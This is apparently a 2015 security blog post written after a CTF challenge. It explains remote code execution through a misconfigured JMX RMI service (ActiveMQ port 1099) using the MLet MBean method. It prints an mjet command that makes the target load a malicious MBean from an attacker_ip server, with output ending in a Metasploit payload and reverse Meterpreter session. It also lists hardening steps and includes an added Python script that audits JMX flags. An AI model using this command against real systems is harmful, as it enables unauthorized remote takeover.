16 Apr 2015 - Demon
[+] Author: Demon
[+] Team: n0tr00t security team
[+] From: http://www.n0tr00t.com
[+] Create: 2015-04-16
Exploitation method
Exploiting JMX RMI
The reason for writing this article is that one of the final challenges of alictf, @cnbird's Linux penetration challenge, involved a machine with port 1099 open. After the competition, many participants said they were interested in this exploitation technique, so I have written it up here for easy reference.
In the challenge, port 1099 was the JMX RMI service of Apache ActiveMQ. Because it was misconfigured, an attacker could call the getMBeansFromURL method of javax.management.loading.MLet through this port to load a remote malicious MBean, that is, execute arbitrary code remotely. This JMX exploitation technique is not limited to ActiveMQ; it applies to many services that expose JMX.
The referenced article (see the references below) analyses the underlying vulnerability and the construction of an exploit in detail, so that is not repeated here. How can this vulnerability be used to deliver and run a Meterpreter payload directly from Metasploit? A JMX exploitation tool called mjet, written abroad, is available on GitHub and documents the method in detail. First, set up Metasploit on a machine reachable from the target and start the Java MLet server module so that the target can load the malicious code from it; then run mjet.jar against the target. The command is as follows:
java -jar mjet.jar -t target_ip -p 1099 -u http://attacker_ip:8080/mlet/
attacker_ip is the public IP of the machine on which Metasploit is installed. If the exploit succeeds, output like the following is returned:
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
The execution flow is clear at a glance. Back on the Metasploit side, the Java MLet server module then receives a reverse Meterpreter session.
Defensive measures
- Enable SSL client certificate authentication in the JMX configuration.
- Enable password-based authentication and use SSL for the transport.
- Restrict access to the JMX RMI port with iptables.
References
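As an added example (not part of the original post or of mjet), the following script audits a JVM command line against the first two measures above using the standard com.sun.management.jmxremote.* system properties documented in the Oracle management agent guide referenced below. It assumes the JMX remote agent is enabled through those properties (ActiveMQ's own connector configured in activemq.xml is not covered); the command lines at the bottom are constructed samples.

```python
import shlex

# Prefix of the JVM system properties that configure the built-in JMX remote
# agent (see the Oracle management agent guide in the references).
PREFIX = "com.sun.management.jmxremote"


def parse_jvm_props(cmdline):
    """Return the -Dname=value pairs of a java command line as a dict."""
    props = {}
    for arg in shlex.split(cmdline):
        if arg.startswith("-D"):
            name, _, value = arg[2:].partition("=")
            props[name] = value
    return props


def audit_jmx_flags(cmdline):
    """Check a JVM command line against the defensive measures above.

    Returns a list of findings; an empty list means the JMX remote agent is
    either not enabled through these properties, or is enabled with
    authentication, SSL transport and client certificate verification.
    """
    props = parse_jvm_props(cmdline)
    port = props.get(f"{PREFIX}.port")
    if port is None:
        return []  # remote agent not enabled via the standard property

    def flag(name, default):
        # Defaults follow the Oracle documentation for each property.
        return props.get(f"{PREFIX}.{name}", default).strip().lower()

    findings = []
    if flag("authenticate", "true") == "false":
        findings.append(f"port {port}: authentication disabled")
    if flag("ssl", "true") == "false":
        findings.append(f"port {port}: SSL transport disabled")
    elif flag("ssl.need.client.auth", "false") != "true":
        findings.append(f"port {port}: SSL client certificate authentication not required")
    return findings


# Constructed sample command lines (not taken from the challenge machine).
INSECURE = ("java -Dcom.sun.management.jmxremote.port=1099 "
            "-Dcom.sun.management.jmxremote.authenticate=false "
            "-Dcom.sun.management.jmxremote.ssl=false -jar activemq.jar")
HARDENED = ("java -Dcom.sun.management.jmxremote.port=1099 "
            "-Dcom.sun.management.jmxremote.authenticate=true "
            "-Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password "
            "-Dcom.sun.management.jmxremote.access.file=/etc/jmx/jmxremote.access "
            "-Dcom.sun.management.jmxremote.ssl=true "
            "-Dcom.sun.management.jmxremote.ssl.need.client.auth=true -jar activemq.jar")

if __name__ == "__main__":
    for label, cmd in (("insecure", INSECURE), ("hardened", HARDENED)):
        print(label, audit_jmx_flags(cmd) or ["no findings"])
```

In practice the command line comes from the process list of the host being reviewed; a JVM with no findings should still be placed behind the iptables rule from the third measure.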
- http://drops.wooyun.org/papers/178
- http://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html